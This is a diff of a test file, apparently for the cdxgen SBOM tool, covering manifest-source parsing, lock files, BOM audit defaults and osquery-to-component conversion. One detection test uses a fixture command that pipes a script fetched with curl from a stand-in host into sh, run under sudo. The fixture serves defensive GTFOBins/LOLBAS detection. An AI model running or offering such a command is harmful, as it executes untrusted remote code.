+  expectParseError("testpkg/1.2.3@someuser/somechannel/unexpected"); // unexpected pkg ref segment separator
+  expectParseError(
+    "testpkg/1.2.3@someuser/somechannel#recipe_revision/unexpected",
+  ); // unexpected pkg ref segment separator
+  expectParseError(
+    "testpkg/1.2.3@someuser/somechannel#recipe_revision:package_id/unexpected",
+  ); // unexpected pkg ref segment separator
+  expectParseError(
+    "testpkg/1.2.3@someuser/somechannel#recipe_revision:package_id#package_revision/unexpected",
+  ); // unexpected pkg ref segment separator
 });
 
 it("parse conan data where packages use custom user/channel", () => {
@@ -3582,6 +4289,44 @@ it("parse project.assets.json", () => {
   */
 });
 
+it("addEvidenceForDotnet() initializes evidence before adding occurrences", () => {
+  const tempDir = mkdtempSync(path.join(tmpdir(), "cdxgen-dotnet-evidence-"));
+  const slicesFile = path.join(tempDir, "dosai.json");
+  try {
+    writeFileSync(
+      slicesFile,
+      JSON.stringify({
+        Dependencies: [
+          {
+            Module: "Example.dll",
+            Path: "src/Program.cs",
+            LineNumber: 42,
+          },
+        ],
+      }),
+    );
+    const pkgList = addEvidenceForDotnet(
+      [
+        {
+          name: "Example",
+          purl: "pkg:nuget/Example@1.0.0",
+          properties: [{ name: "PackageFiles", value: "Example.dll" }],
+        },
+      ],
+      slicesFile,
+    );
+    assert.deepStrictEqual(pkgList[0].evidence?.occurrences, [
+      {
+        location: "src/Program.cs",
+        line: 42,
+      },
+    ]);
+    assert.strictEqual(pkgList[0].scope, "required");
+  } finally {
+    rmSync(tempDir, { recursive: true, force: true });
+  }
+});
+
 it("parse packages.lock.json", () => {
   assert.deepStrictEqual(parseCsPkgLockData(null), {
     dependenciesList: [],
@@ -4823,6 +5568,181 @@ it("parsePkgLock marks devOptional entries as development", async () => {
   );
 });
 
+it("parsePkgLock captures manifest-declared npm direct sources", async () => {
+  const rootNode = {
+    path: "/virtual/project",
+    package: {
+      author: "",
+      license: "MIT",
+    },
+    packageName: "virtual-project",
+    version: "1.0.0",
+    edgesOut: new Map(),
+    fsChildren: new Set(),
+    children: new Map(),
+  };
+  const gitNode = {
+    path: "/virtual/project/node_modules/git-dep",
+    package: {
+      author: "",
+      license: "MIT",
+    },
+    packageName: "git-dep",
+    version: "2.0.0",
+    hasInstallScript: true,
+    integrity: "sha512-gitdep",
+    edgesIn: new Set([
+      {
+        name: "git-dep",
+        spec: "git+https://github.com/acme/git-dep.git",
+      },
+    ]),
+    edgesOut: new Map(),
+    fsChildren: new Set(),
+    children: new Map(),
+  };
+  rootNode.children.set("node_modules/git-dep", gitNode);
+  rootNode.edgesOut.set("git-dep", {
+    name: "git-dep",
+    spec: "git+https://github.com/acme/git-dep.git",
+    to: gitNode,
+  });
+  const { parsePkgLock: parsePkgLockWithMockedArborist } = await esmock(
+    "./utils.js",
+    {
+      "../third-party/arborist/lib/index.js": {
+        default: class MockArborist {
+          async loadVirtual() {
+            return rootNode;
+          }
+        },
+      },
+    },
+  );
+  const parsedList = await parsePkgLockWithMockedArborist(
+    "./test/data/package-json/v3/package-lock.json",
+    {},
+  );
+  const gitDepPkg = parsedList.pkgList.find(
+    (pkg) => pkg["bom-ref"] === "pkg:npm/git-dep@2.0.0",
+  );
+  assert.ok(gitDepPkg);
+  assert.ok(
+    gitDepPkg.properties.some(
+      (property) =>
+        property.name === "cdx:npm:manifestSourceType" &&
+        property.value === "git",
+    ),
+  );
+  assert.ok(
+    gitDepPkg.properties.some(
+      (property) =>
+        property.name === "cdx:npm:manifestSource" &&
+        property.value === "git+https://github.com/acme/git-dep.git",
+    ),
+  );
+});
+
+it("parsePkgLock captures supported npm manifest source syntaxes", async () => {
+  const rootNode = {
+    path: "/virtual/project",
+    package: {
+      author: "",
+      license: "MIT",
+    },
+    packageName: "virtual-project",
+    version: "1.0.0",
+    edgesOut: new Map(),
+    fsChildren: new Set(),
+    children: new Map(),
+  };
+  const sourceCases = [
+    ["git-plus", "git+https://github.com/acme/git-plus.git", "git"],
+    ["git-protocol", "git://github.com/acme/git-protocol.git", "git"],
+    ["github-shortcut", "github:acme/github-shortcut", "git"],
+    ["gitlab-shortcut", "gitlab:acme/gitlab-shortcut", "git"],
+    ["bitbucket-shortcut", "bitbucket:acme/bitbucket-shortcut", "git"],
+    ["gist-shortcut", "gist:1234567890abcdef", "git"],
+    ["http-archive", "http://example.com/http-archive.tgz", "url"],
+    ["https-archive", "https://example.com/https-archive.tgz", "url"],
+    ["file-source", "file:../libs/file-source", "path"],
+    ["link-source", "link:../libs/link-source", "path"],
+    ["workspace-source", "workspace:*", "path"],
+    ["relative-source", "./libs/relative-source", "path"],
+    ["parent-source", "../libs/parent-source", "path"],
+    ["absolute-source", "/opt/libs/absolute-source", "path"],
+    ["windows-source", "C:\\libs\\windows-source", "path"],
+  ];
+
+  for (const [packageName, spec] of sourceCases) {
+    const childPath = `/virtual/project/node_modules/${packageName}`;
+    const childNode = {
+      path: childPath,
+      package: {
+        author: "",
+        license: "MIT",
+      },
+      packageName,
+      version: "1.0.0",
+      integrity: `sha512-${packageName}`,
+      edgesIn: new Set([
+        {
+          name: packageName,
+          spec,
+        },
+      ]),
+      edgesOut: new Map(),
+      fsChildren: new Set(),
+      children: new Map(),
+    };
+    rootNode.children.set(`node_modules/${packageName}`, childNode);
+    rootNode.edgesOut.set(packageName, {
+      name: packageName,
+      spec,
+      to: childNode,
+    });
+  }
+
+  const { parsePkgLock: parsePkgLockWithMockedArborist } = await esmock(
+    "./utils.js",
+    {
+      "../third-party/arborist/lib/index.js": {
+        default: class MockArborist {
+          async loadVirtual() {
+            return rootNode;
+          }
+        },
+      },
+    },
+  );
+  const parsedList = await parsePkgLockWithMockedArborist(
+    "./test/data/package-json/v3/package-lock.json",
+    {},
+  );
+
+  for (const [packageName, spec, expectedType] of sourceCases) {
+    const pkg = parsedList.pkgList.find(
+      (parsedPkg) => parsedPkg.name === packageName,
+    );
+    assert.ok(pkg, `expected ${packageName} to be parsed`);
+    assert.ok(
+      pkg.properties.some(
+        (property) =>
+          property.name === "cdx:npm:manifestSourceType" &&
+          property.value === expectedType,
+      ),
+      `expected ${packageName} manifest source type ${expectedType}`,
+    );
+    assert.ok(
+      pkg.properties.some(
+        (property) =>
+          property.name === "cdx:npm:manifestSource" && property.value === spec,
+      ),
+      `expected ${packageName} manifest source ${spec}`,
+    );
+  }
+});
+
 it("parsePkgLock theia", async () => {
   const parsedList = await parsePkgLock(
     "./test/data/package-json/theia/package-lock.json",
@@ -7465,6 +8385,112 @@ it("parse requirements.txt", async () => {
   }
 });
 
+it("parse requirements.txt enriches distribution references when package metadata fetch is enabled", async () => {
+  const tempDir = mkdtempSync(path.join(tmpdir(), "cdxgen-req-pypi-"));
+  const reqFile = path.join(tempDir, "requirements.txt");
+  const agentGetStub = sinon.stub().resolves({
+    body: {
+      info: {
+        author: "",
+        author_email: "",
+        classifiers: [],
+        license: "",
+        license_expression: "",
+        name: "requests",
+        summary: "HTTP client",
+        version: "2.31.0",
+      },
+      releases: {
+        "2.31.0": [
+          {
+            digests: { sha256: "abc123" },
+            filename: "requests-2.31.0-py3-none-any.whl",
+            packagetype: "bdist_wheel",
+            url: "https://files.pythonhosted.org/packages/example/requests-2.31.0-py3-none-any.whl",
+          },
+        ],
+      },
+    },
+  });
+  writeFileSync(reqFile, "requests==2.31.0\n", "utf-8");
+  const { parseReqFile: mockedParseReqFile } = await esmock("./utils.js", {
+    got: {
+      default: {
+        extend: sinon.stub().returns({ get: agentGetStub }),
+      },
+    },
+  });
+  try {
+    const deps = await mockedParseReqFile(reqFile, true);
+    assert.strictEqual(deps.length, 1);
+    assert.ok(
+      deps[0].externalReferences?.some(
+        (reference) =>
+          reference.type === "distribution" && reference.url.endsWith(".whl"),
+      ),
+    );
+  } finally {
+    rmSync(tempDir, { recursive: true, force: true });
+  }
+});
+
+it("parse requirements.txt captures direct manifest sources", async () => {
+  const tempDir = mkdtempSync(path.join(tmpdir(), "cdxgen-req-source-"));
+  const reqFile = path.join(tempDir, "requirements.txt");
+  writeFileSync(
+    reqFile,
+    [
+      "requests @ https://example.com/packages/requests-2.31.0.whl  # MIT",
+      "-e git+https://github.com/acme/private-lib.git#egg=private-lib",
+      "",
+    ].join("\n"),
+    "utf-8",
+  );
+  try {
+    const deps = await parseReqFile(reqFile, false);
+    const requestsPkg = deps.find((pkg) => pkg.name === "requests");
+    assert.ok(requestsPkg);
+    assert.ok(
+      requestsPkg.properties.some(
+        (property) =>
+          property.name === "cdx:pypi:manifestSourceType" &&
+          property.value === "url",
+      ),
+    );
+    assert.ok(
+      requestsPkg.properties.some(
+        (property) =>
+          property.name === "cdx:pypi:manifestSource" &&
+          property.value === "https://example.com/packages/requests-2.31.0.whl",
+      ),
+    );
+    assert.deepStrictEqual(requestsPkg.licenses, [
+      {
+        license: {
+          id: "MIT",
+        },
+      },
+    ]);
+    const privateLibPkg = deps.find((pkg) => pkg.name === "private-lib");
+    assert.ok(privateLibPkg);
+    assert.ok(
+      privateLibPkg.properties.some(
+        (property) =>
+          property.name === "cdx:pypi:manifestSourceType" &&
+          property.value === "git",
+      ),
+    );
+    assert.ok(
+      privateLibPkg.properties.some(
+        (property) =>
+          property.name === "cdx:pypi:editable" && property.value === "true",
+      ),
+    );
+  } finally {
+    rmSync(tempDir, { recursive: true, force: true });
+  }
+});
+
 it("parse pyproject.toml", () => {
   let retMap = parsePyProjectTomlFile("./test/data/pyproject.toml");
   assert.deepStrictEqual(retMap.parentComponent, {
@@ -7669,6 +8695,120 @@ it("parse pyproject.toml with custom poetry source", () => {
   assert.deepStrictEqual(Object.keys(retMap.directDepsKeys).length, 6);
 });
 
+it("parse pyproject.toml captures dependency manifest sources", async () => {
+  const tempDir = mkdtempSync(path.join(tmpdir(), "cdxgen-pyproject-source-"));
+  const pyProjectFile = path.join(tempDir, "pyproject.toml");
+  writeFileSync(
+    pyProjectFile,
+    `
+[project]
+name = "demo-app"
+version = "0.1.0"
+dependencies = ["anyio[http2] @ https://example.com/packages/anyio.whl"]
+
+[tool.poetry.dependencies]
+python = ">=3.11"
+poetry-git = { git = "https://github.com/acme/poetry-git.git" }
+
+[tool.uv.sources]
+uv-path = { path = "../libs/uv-path" }
+    `.trim(),
+    "utf-8",
+  );
+  try {
+    const pyProjectData = parsePyProjectTomlFile(pyProjectFile);
+    assert.deepStrictEqual(pyProjectData.dependencySourceMap.anyio, {
+      type: "url",
+      value: "https://example.com/packages/anyio.whl",
+    });
+    assert.strictEqual(pyProjectData.directDepsKeys.anyio, true);
+    assert.deepStrictEqual(pyProjectData.dependencySourceMap["poetry-git"], {
+      type: "git",
+      value: "https://github.com/acme/poetry-git.git",
+    });
+    assert.deepStrictEqual(pyProjectData.dependencySourceMap["uv-path"], {
+      type: "path",
+      value: "../libs/uv-path",
+    });
+
+    const retMap = await parsePyLockData(
+      readFileSync("./test/data/uv.lock", { encoding: "utf-8" }),
+      "./test/data/uv.lock",
+      pyProjectFile,
+    );
+    const anyioPkg = retMap.pkgList.find((pkg) => pkg.name === "anyio");
+    assert.ok(anyioPkg);
+    assert.ok(
+      anyioPkg.properties.some(
+        (property) =>
+          property.name === "cdx:pypi:manifestSourceType" &&
+          property.value === "url",
+      ),
+    );
+    assert.ok(
+      anyioPkg.properties.some(
+        (property) =>
+          property.name === "cdx:pypi:manifestSource" &&
+          property.value === "https://example.com/packages/anyio.whl",
+      ),
+    );
+  } finally {
+    rmSync(tempDir, { recursive: true, force: true });
+  }
+});
+
+it("normalizes pyproject direct dependency keys when matching pylock packages", async () => {
+  const tempDir = mkdtempSync(path.join(tmpdir(), "cdxgen-pylock-normalize-"));
+  const pyProjectFile = path.join(tempDir, "pyproject.toml");
+  const pyLockFile = path.join(tempDir, "pylock.toml");
+  writeFileSync(
+    pyProjectFile,
+    `
+[project]
+name = "normalize-demo"
+version = "1.0.0"
+dependencies = [
+  "demo_pkg @ https://example.com/packages/demo-pkg-1.0.0.whl",
+]
+    `.trim(),
+    "utf-8",
+  );
+  writeFileSync(
+    pyLockFile,
+    `
+lock-version = "1.0"
+created-by = "poku"
+
+[[packages]]
+name = "demo-pkg"
+version = "1.0.0"
+index = "https://pypi.org/simple/"
+wheels = [
+  { name = "demo_pkg-1.0.0-py3-none-any.whl", url = "https://example.com/packages/demo-pkg-1.0.0.whl", size = 1234, upload-time = 2026-01-01T00:00:00+00:00, hashes = { sha256 = "0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef" } },
+]
+    `.trim(),
+    "utf-8",
+  );
+  try {
+    const retMap = await parsePyLockData(
+      readFileSync(pyLockFile, { encoding: "utf-8" }),
+      pyLockFile,
+      pyProjectFile,
+    );
+    assert.strictEqual(retMap.rootList.length, 1);
+    assert.strictEqual(retMap.rootList[0].name, "demo-pkg");
+    assert.ok(
+      retMap.rootList[0].properties.some(
+        (property) =>
+          property.name === "cdx:pypi:manifestSourceType" &&
+          property.value === "url",
+      ),
+    );
+  } finally {
+    rmSync(tempDir, { recursive: true, force: true });
+  }
+});
+
 it("parse python lock files", async () => {
   let retMap = await parsePyLockData(
     readFileSync("./test/data/poetry.lock", { encoding: "utf-8" }),
@@ -7693,14 +8833,30 @@ it("parse python lock files", async () => {
     readFileSync("./test/data/pdm.lock", { encoding: "utf-8" }),
     "./test/data/pdm.lock",
   );
-  assert.deepStrictEqual(retMap.pkgList.length, 39);
-  assert.deepStrictEqual(retMap.dependenciesList.length, 37);
+  assert.deepStrictEqual(retMap.pkgList.length, 39);
+  assert.deepStrictEqual(retMap.dependenciesList.length, 37);
+  const pdmBlinkerPkg = retMap.pkgList.find((p) => p.name === "blinker");
+  assert.ok(
+    pdmBlinkerPkg.externalReferences?.some(
+      (reference) =>
+        reference.type === "distribution" && reference.url.endsWith(".whl"),
+    ),
+    "Expected pdm.lock metadata files to populate distribution externalReferences",
+  );
   retMap = await parsePyLockData(
     readFileSync("./test/data/uv.lock", { encoding: "utf-8" }),
     "./test/data/uv.lock",
   );
   assert.deepStrictEqual(retMap.pkgList.length, 63);
   assert.deepStrictEqual(retMap.dependenciesList.length, 63);
+  const uvAnyioPkg = retMap.pkgList.find((p) => p.name === "anyio");
+  assert.ok(
+    uvAnyioPkg.externalReferences?.some(
+      (reference) =>
+        reference.type === "distribution" && reference.url.endsWith(".whl"),
+    ),
+    "Expected uv.lock packages to populate distribution externalReferences",
+  );
   retMap = await parsePyLockData(
     readFileSync("./test/data/uv-workspace.lock", { encoding: "utf-8" }),
     "./test/data/uv-workspace.lock",
@@ -7727,6 +8883,13 @@ it("parse python lock files", async () => {
     attrsPkg.components?.length,
     "Expected pylock wheel entry to produce file component",
   );
+  assert.ok(
+    attrsPkg.externalReferences?.some(
+      (reference) =>
+        reference.type === "distribution" && reference.url.endsWith(".whl"),
+    ),
+    "Expected pylock package to retain distribution externalReferences",
+  );
   const cattrsPkg = retMap.pkgList.find((p) => p.name === "cattrs");
   assert.ok(
     cattrsPkg.properties.some(
@@ -8881,6 +10044,80 @@ it("parsePackageJsonName tests", () => {
   });
 });
 
+it("extractToolRefs collects unique bom-refs from metadata.tools", () => {
+  assert.deepStrictEqual(
+    extractToolRefs(
+      {
+        components: [
+          { name: "trivy", "bom-ref": "pkg:generic/trivy@0.1.0" },
+          { name: "trivy", "bom-ref": "pkg:generic/trivy@0.1.0" },
+          { name: "cdxgen" },
+        ],
+        services: [{ name: "blint", "bom-ref": "urn:tool:blint" }],
+      },
+      (tool) => tool.name !== "cdxgen",
+    ),
+    ["pkg:generic/trivy@0.1.0", "urn:tool:blint"],
+  );
+});
+
+it("extractToolRefs derives and persists bom-refs for external tools", () => {
+  const tools = {
+    components: [
+      {
+        group: "aquasecurity",
+        name: "trivy",
+        version: "dev",
+      },
+    ],
+  };
+  assert.deepStrictEqual(extractToolRefs(tools), [
+    "pkg:generic/aquasecurity/trivy@dev",
+  ]);
+  assert.strictEqual(
+    tools.components[0]["bom-ref"],
+    "pkg:generic/aquasecurity/trivy@dev",
+  );
+});
+
+it("attachIdentityTools adds tool references to object and array identities", () => {
+  const subjects = [
+    {
+      evidence: {
+        identity: {
+          field: "purl",
+          tools: ["pkg:generic/existing-tool@1.0.0"],
+        },
+      },
+    },
+    {
+      evidence: {
+        identity: [
+          { field: "purl" },
+          { field: "hash", tools: ["urn:tool:hash"] },
+        ],
+      },
+    },
+  ];
+  attachIdentityTools(subjects, [
+    "pkg:generic/existing-tool@1.0.0",
+    "pkg:generic/trivy@0.1.0",
+  ]);
+  assert.deepStrictEqual(subjects[0].evidence.identity.tools, [
+    "pkg:generic/existing-tool@1.0.0",
+    "pkg:generic/trivy@0.1.0",
+  ]);
+  assert.deepStrictEqual(subjects[1].evidence.identity[0].tools, [
+    "pkg:generic/existing-tool@1.0.0",
+    "pkg:generic/trivy@0.1.0",
+  ]);
+  assert.deepStrictEqual(subjects[1].evidence.identity[1].tools, [
+    "urn:tool:hash",
+    "pkg:generic/existing-tool@1.0.0",
+    "pkg:generic/trivy@0.1.0",
+  ]);
+});
+
 it("parseDot tests", () => {
   const retMap = parseCmakeDotFile("./test/data/tslite.dot", "conan");
   assert.deepStrictEqual(retMap.parentComponent, {
@@ -9055,6 +10292,20 @@ it("hasAnyProjectType tests", () => {
     }),
     true,
   );
+  assert.deepStrictEqual(
+    hasAnyProjectType(["oci"], {
+      projectType: ["rootfs"],
+      excludeType: undefined,
+    }),
+    true,
+  );
+  assert.deepStrictEqual(
+    hasAnyProjectType(["docker"], {
+      projectType: ["rootfs"],
+      excludeType: undefined,
+    }),
+    true,
+  );
 
   assert.deepStrictEqual(
     hasAnyProjectType(["js"], {
@@ -9236,6 +10487,85 @@ it("hasAnyProjectType tests", () => {
   );
 });
 
+it("shouldRunPredictiveBomAudit tests", () => {
+  assert.strictEqual(shouldRunPredictiveBomAudit({}, "cdxgen"), true);
+  assert.strictEqual(
+    shouldRunPredictiveBomAudit({ projectType: ["os"] }, "cdxgen"),
+    false,
+  );
+  assert.strictEqual(
+    shouldRunPredictiveBomAudit({ projectType: ["linux"] }, "cdxgen"),
+    false,
+  );
+  assert.strictEqual(
+    shouldRunPredictiveBomAudit({ projectType: ["os", "darwin"] }, "cdxgen"),
+    false,
+  );
+  assert.strictEqual(
+    shouldRunPredictiveBomAudit({ projectType: ["os", "js"] }, "cdxgen"),
+    true,
+  );
+  assert.strictEqual(
+    shouldRunPredictiveBomAudit({ projectType: "os,linux" }, "cdxgen"),
+    false,
+  );
+  assert.strictEqual(
+    shouldRunPredictiveBomAudit({ projectType: ["hbom"] }, "cdxgen"),
+    false,
+  );
+  assert.strictEqual(
+    shouldRunPredictiveBomAudit({ projectType: ["hardware"] }, "cdxgen"),
+    false,
+  );
+  assert.strictEqual(
+    shouldRunPredictiveBomAudit({ projectType: ["js"] }, "obom"),
+    false,
+  );
+  assert.strictEqual(
+    shouldRunPredictiveBomAudit({ projectType: ["js"] }, "hbom"),
+    false,
+  );
+});
+
+it("getDefaultBomAuditCategories tests", () => {
+  assert.strictEqual(getDefaultBomAuditCategories({}, "cdxgen"), undefined);
+  assert.strictEqual(
+    getDefaultBomAuditCategories({ projectType: ["os"] }, "cdxgen"),
+    "obom-runtime",
+  );
+  assert.strictEqual(
+    getDefaultBomAuditCategories({ projectType: ["linux"] }, "cdxgen"),
+    "obom-runtime",
+  );
+  assert.strictEqual(
+    getDefaultBomAuditCategories({ projectType: ["os", "js"] }, "cdxgen"),
+    undefined,
+  );
+  assert.strictEqual(
+    getDefaultBomAuditCategories({ projectType: ["hbom"] }, "cdxgen"),
+    "hbom-security,hbom-performance,hbom-compliance",
+  );
+  assert.strictEqual(
+    getDefaultBomAuditCategories({ projectType: ["hardware"] }, "cdxgen"),
+    "hbom-security,hbom-performance,hbom-compliance",
+  );
+  assert.strictEqual(
+    getDefaultBomAuditCategories(
+      { includeRuntime: true, projectType: ["hbom"] },
+      "cdxgen",
+    ),
+    "hbom-security,hbom-performance,hbom-compliance,host-topology",
+  );
+  assert.strictEqual(
+    getDefaultBomAuditCategories({ projectType: ["js"] }, "obom"),
+    "obom-runtime",
+  );
+  assert.strictEqual(
+    getDefaultBomAuditCategories({ projectType: ["js"] }, "hbom"),
+    "hbom-security,hbom-performance,hbom-compliance",
+  );
+});
+
 it("isPackageManagerAllowed tests", () => {
   assert.deepStrictEqual(
     isPackageManagerAllowed("uv", ["pip", "poetry", "hatch", "pdm"], {
@@ -9798,6 +11128,152 @@ it("parses valid minified js with real package name (#2717)", async () => {
 });
 
 describe("convertOSQueryResults", () => {
+  it("includes the osquery 5.23.0 query pack additions across platform profiles", () => {
+    const linuxQueries = JSON.parse(
+      readFileSync(
+        new URL("../../data/queries.json", import.meta.url),
+        "utf-8",
+      ),
+    );
+    const darwinQueries = JSON.parse(
+      readFileSync(
+        new URL("../../data/queries-darwin.json", import.meta.url),
+        "utf-8",
+      ),
+    );
+    const windowsQueries = JSON.parse(
+      readFileSync(
+        new URL("../../data/queries-win.json", import.meta.url),
+        "utf-8",
+      ),
+    );
+
+    assert.ok(linuxQueries.npm_packages);
+    assert.ok(linuxQueries.secureboot_certificates);
+    assert.ok(linuxQueries.apt_ppa_sources);
+    assert.ok(linuxQueries.sysctl_hardening);
+    assert.ok(linuxQueries.mount_hardening);
+    assert.ok(linuxQueries.trusted_gpg_keys);
+    assert.ok(darwinQueries.gatekeeper);
+    assert.ok(darwinQueries.npm_packages);
+    assert.match(
+      darwinQueries.package_bom.query,
+      /WHERE path IN \(SELECT REPLACE\(package_receipts\.path, '.plist', '.bom'\) FROM package_receipts JOIN file ON file\.path = REPLACE\(package_receipts\.path, '.plist', '.bom'\) WHERE package_receipts\.path LIKE '%.plist' AND file\.size <= 52428800\)/i,
+    );
+    assert.match(linuxQueries.trusted_gpg_keys.query, /file\.directory/);
+    assert.match(linuxQueries.trusted_gpg_keys.query, /hash\.sha256/);
+    assert.ok(windowsQueries.process_open_handles_snapshot);
+  });
+
+  it("should model trusted linux repository keys as cryptographic assets", () => {
+    const components = convertOSQueryResults(
+      "trusted_gpg_keys",
+      {
+        purlType: "generic",
+        componentType: "cryptographic-asset",
+      },
+      [
+        {
+          name: "debian-archive-keyring.gpg",
+          version: "c".repeat(64),
+          description: "/usr/share/keyrings/debian-archive-keyring.gpg",
+          path: "/usr/share/keyrings/debian-archive-keyring.gpg",
+          sha1: "b".repeat(40),
+          sha256: "c".repeat(64),
+          trust_domain: "apt",
+        },
+      ],
+      false,
+    );
+    assert.strictEqual(components.length, 1);
+    assert.strictEqual(components[0].type, "cryptographic-asset");
+    assert.strictEqual(components[0].purl, undefined);
+    assert.ok(
+      components[0]["bom-ref"].startsWith(
+        "crypto/related-crypto-material/public-key/",
+      ),
+    );
+    assert.strictEqual(
+      components[0].cryptoProperties?.assetType,
+      "related-crypto-material",
+    );
+    assert.strictEqual(
+      components[0].cryptoProperties?.relatedCryptoMaterialProperties?.type,
+      "public-key",
+    );
+    assert.ok(
+      components[0].hashes.some(
+        (hash) => hash.alg === "SHA-256" && hash.content === "c".repeat(64),
+      ),
+    );
+  });
+
+  it("should preserve the full certificate crypto properties shape", () => {
+    const components = convertOSQueryResults(
+      "certificates",
+      {
+        purlType: "generic",
+        componentType: "cryptographic-asset",
+      },
+      [
+        {
+          name: "ACCVRAIZ1",
+          path: "/etc/ssl/certs/ACCVRAIZ1.crt",
+          serial: "5EC3B7A6437FA4E0",
+          subject: "/CN=ACCVRAIZ1/OU=PKIACCV/O=ACCV/C=ES",
+          issuer: "/CN=ACCVRAIZ1/OU=PKIACCV/O=ACCV/C=ES",
+          not_valid_before: "2011-05-05T09:37:37.000Z",
+          not_valid_after: "2030-12-31T09:37:37.000Z",
+          sha1: "1".repeat(40),
+        },
+      ],
+      false,
+    );
+    assert.strictEqual(components.length, 1);
+    assert.strictEqual(components[0].type, "cryptographic-asset");
+    assert.strictEqual(
+      components[0].cryptoProperties?.assetType,
+      "certificate",
+    );
+    assert.deepStrictEqual(
+      components[0].cryptoProperties?.certificateProperties,
+      {
+        serialNumber: "5EC3B7A6437FA4E0",
+        subjectName: "/CN=ACCVRAIZ1/OU=PKIACCV/O=ACCV/C=ES",
+        issuerName: "/CN=ACCVRAIZ1/OU=PKIACCV/O=ACCV/C=ES",
+        notValidBefore: "2011-05-05T09:37:37.000Z",
+        notValidAfter: "2030-12-31T09:37:37.000Z",
+        certificateFormat: "X.509",
+        certificateFileExtension: "crt",
+        fingerprint: { alg: "SHA-1", content: "1".repeat(40) },
+      },
+    );
+  });
+
+  it("should ignore empty occurrence locations when adding import evidence", async () => {
+    const pkgList = [{ name: "lodash" }];
+    const allImports = {
+      lodash: [
+        {
+          fileName: "   ",
+          importedAs: "lodash",
+          importedModules: ["map"],
+        },
+      ],
+    };
+
+    await addEvidenceForImports(pkgList, allImports, {}, false);
+
+    assert.strictEqual(pkgList[0].scope, "required");
+    assert.strictEqual(pkgList[0].evidence, undefined);
+    assert.deepStrictEqual(pkgList[0].properties, [
+      {
+        name: "ImportedModules",
+        value: "lodash,lodash/map",
+      },
+    ]);
+  });
+
   it("should use identifier as package name for chrome-extension purl type", () => {
     const components = convertOSQueryResults(
       "chrome_extensions",
@@ -9826,6 +11302,32 @@ describe("convertOSQueryResults", () => {
     assert.ok(propNames.includes("identifier"));
   });
 
+  it("should omit purl for osquery data components while keeping a stable bom-ref", () => {
+    const components = convertOSQueryResults(
+      "authorized_keys_snapshot",
+      {
+        purlType: "swid",
+        componentType: "data",
+      },
+      [
+        {
+          name: "root",
+          version: "ssh-ed25519",
+          description: "ops@example.invalid",
+          key_file: "/root/.ssh/authorized_keys",
+          uid: "0",
+        },
+      ],
+      false,
+    );
+    assert.strictEqual(components.length, 1);
+    assert.strictEqual(components[0].purl, undefined);
+    assert.strictEqual(
+      components[0]["bom-ref"],
+      "osquery:authorized_keys_snapshot:data:root@ssh-ed25519[key_file=/root/.ssh/authorized_keys]",
+    );
+  });
+
   it("should add LOLBAS properties to suspicious windows osquery rows", () => {
     const components = convertOSQueryResults(
       "windows_run_keys",
@@ -9843,6 +11345,11 @@ describe("convertOSQueryResults", () => {
       false,
     );
     assert.strictEqual(components.length, 1);
+    assert.strictEqual(components[0].purl, undefined);
+    assert.strictEqual(
+      components[0]["bom-ref"],
+      "osquery:windows_run_keys:data:HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater@unknown",
+    );
     const propertyMap = Object.fromEntries(
       components[0].properties.map((property) => [
         property.name,
@@ -9855,4 +11362,221 @@ describe("convertOSQueryResults", () => {
     assert.ok(propertyMap["cdx:lolbas:functions"].includes("download"));
     assert.ok(propertyMap["cdx:lolbas:attackTechniques"].includes("T1059.001"));
   });
+
+  it("should add GTFOBins properties to suspicious Linux osquery rows", () => {
+    if (platform() !== "linux") {
+      return;
+    }
+    const components = convertOSQueryResults(
+      "sudo_executions",
+      {
+        purlType: "swid",
+        componentType: "application",
+      },
+      [
+        {
+          name: "bash",
+          path: "/usr/bin/bash",
+          cmdline: "bash -c 'curl https://example.invalid/p.sh | sh'",
+          parent_cmdline: "sudo bash -c payload",
+        },
+      ],
+      false,
+    );
+    assert.strictEqual(components.length, 1);
+    assert.ok(components[0].purl?.startsWith("pkg:swid/bash"));
+    const propertyMap = Object.fromEntries(
+      components[0].properties.map((property) => [
+        property.name,
+        property.value,
+      ]),
+    );
+    assert.strictEqual(propertyMap["cdx:gtfobins:matched"], "true");
+    assert.ok(propertyMap["cdx:gtfobins:names"].includes("bash"));
+    assert.ok(propertyMap["cdx:gtfobins:functions"].includes("shell"));
+    assert.ok(
+      propertyMap["cdx:gtfobins:queryCategory"].includes("sudo_executions"),
+    );
+  });
+
+  it("collectExecutables() prefers usr-merged executable paths", () => {
+    if (process.platform === "win32") {
+      return;
+    }
+    const tempDir = mkdtempSync(path.join(tmpdir(), "cdxgen-executables-"));
+    try {
+      mkdirSync(path.join(tempDir, "usr", "bin"), { recursive: true });
+      mkdirSync(path.join(tempDir, "usr", "sbin"), { recursive: true });
+      writeFileSync(path.join(tempDir, "usr", "bin", "which"), "#!/bin/sh\n");
+      writeFileSync(
+        path.join(tempDir, "usr", "sbin", "zramctl"),
+        "#!/bin/sh\n",
+      );
+      chmodSync(path.join(tempDir, "usr", "bin", "which"), 0o755);
+      chmodSync(path.join(tempDir, "usr", "sbin", "zramctl"), 0o755);
+      symlinkSync(path.join(tempDir, "usr", "bin"), path.join(tempDir, "bin"));
+      symlinkSync(
+        path.join(tempDir, "usr", "sbin"),
+        path.join(tempDir, "sbin"),
+      );
+
+      const result = collectExecutables(tempDir, [
+        "/bin",
+        "/usr/bin",
+        "/sbin",
+        "/usr/sbin",
+      ]);
+
+      assert.deepStrictEqual(result, ["usr/bin/which", "usr/sbin/zramctl"]);
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  it("collectExecutables() resolves followed symlink targets in dry-run mode", () => {
+    if (process.platform === "win32") {
+      return;
+    }
+    const tempDir = mkdtempSync(path.join(tmpdir(), "cdxgen-executables-"));
+    setDryRunMode(true);
+    resetRecordedActivities();
+    try {
+      mkdirSync(path.join(tempDir, "usr", "bin"), { recursive: true });
+      writeFileSync(path.join(tempDir, "usr", "bin", "which"), "#!/bin/sh\n");
+      chmodSync(path.join(tempDir, "usr", "bin", "which"), 0o755);
+      symlinkSync(path.join(tempDir, "usr", "bin"), path.join(tempDir, "bin"));
+
+      const result = collectExecutables(tempDir, ["/bin"]);
+
+      assert.deepStrictEqual(result, ["usr/bin/which"]);
+      const symlinkActivities = getRecordedActivities().filter(
+        (activity) => activity.kind === "symlink-resolution",
+      );
+      for (const symlinkActivity of symlinkActivities) {
+        assert.strictEqual(symlinkActivity.traceDetail, undefined);
+      }
+    } finally {
+      setDryRunMode(false);
+      resetRecordedActivities();
